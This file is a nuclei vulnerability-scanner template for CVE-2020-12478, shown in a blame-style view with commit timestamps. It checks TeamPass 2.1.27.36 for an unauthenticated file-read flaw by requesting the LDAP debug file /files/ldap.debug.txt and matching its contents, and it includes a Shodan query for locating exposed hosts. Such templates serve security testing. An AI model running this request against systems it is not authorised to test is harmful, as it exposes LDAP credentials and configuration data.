nuclei-templates/cves/2020/CVE-2020-12478.yaml

42 lines
1.0 KiB
YAML
Raw Normal View History

2022-08-17 07:02:47 +00:00
id: CVE-2020-12478
info:
2022-08-17 11:15:20 +00:00
name: TeamPass 2.1.27.36 - Unauthenticated Access
2022-08-17 07:02:47 +00:00
author: arafatansari
severity: high
description: |
TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
reference:
- https://github.com/nilsteampassnet/TeamPass/issues/2764
2022-08-17 11:15:20 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-08-17 11:15:20 +00:00
cve-id: CVE-2020-12478
cwe-id: CWE-306
2022-08-17 07:02:47 +00:00
metadata:
shodan-query: http.html:"teampass"
verified: "true"
2022-08-20 09:53:00 +00:00
tags: cve,cve2020,teampass,exposure,unauth
2022-08-17 07:02:47 +00:00
requests:
2022-08-17 11:15:20 +00:00
- method: GET
path:
- "{{BaseURL}}/files/ldap.debug.txt"
2022-08-17 07:02:47 +00:00
matchers-condition: and
matchers:
- type: word
2022-08-20 09:53:00 +00:00
part: body
2022-08-17 07:02:47 +00:00
words:
- 'Get all LDAP params'
2022-08-20 09:53:00 +00:00
- type: word
part: header
words:
- "text/plain"
2022-08-17 11:15:20 +00:00
- type: status
status:
- 200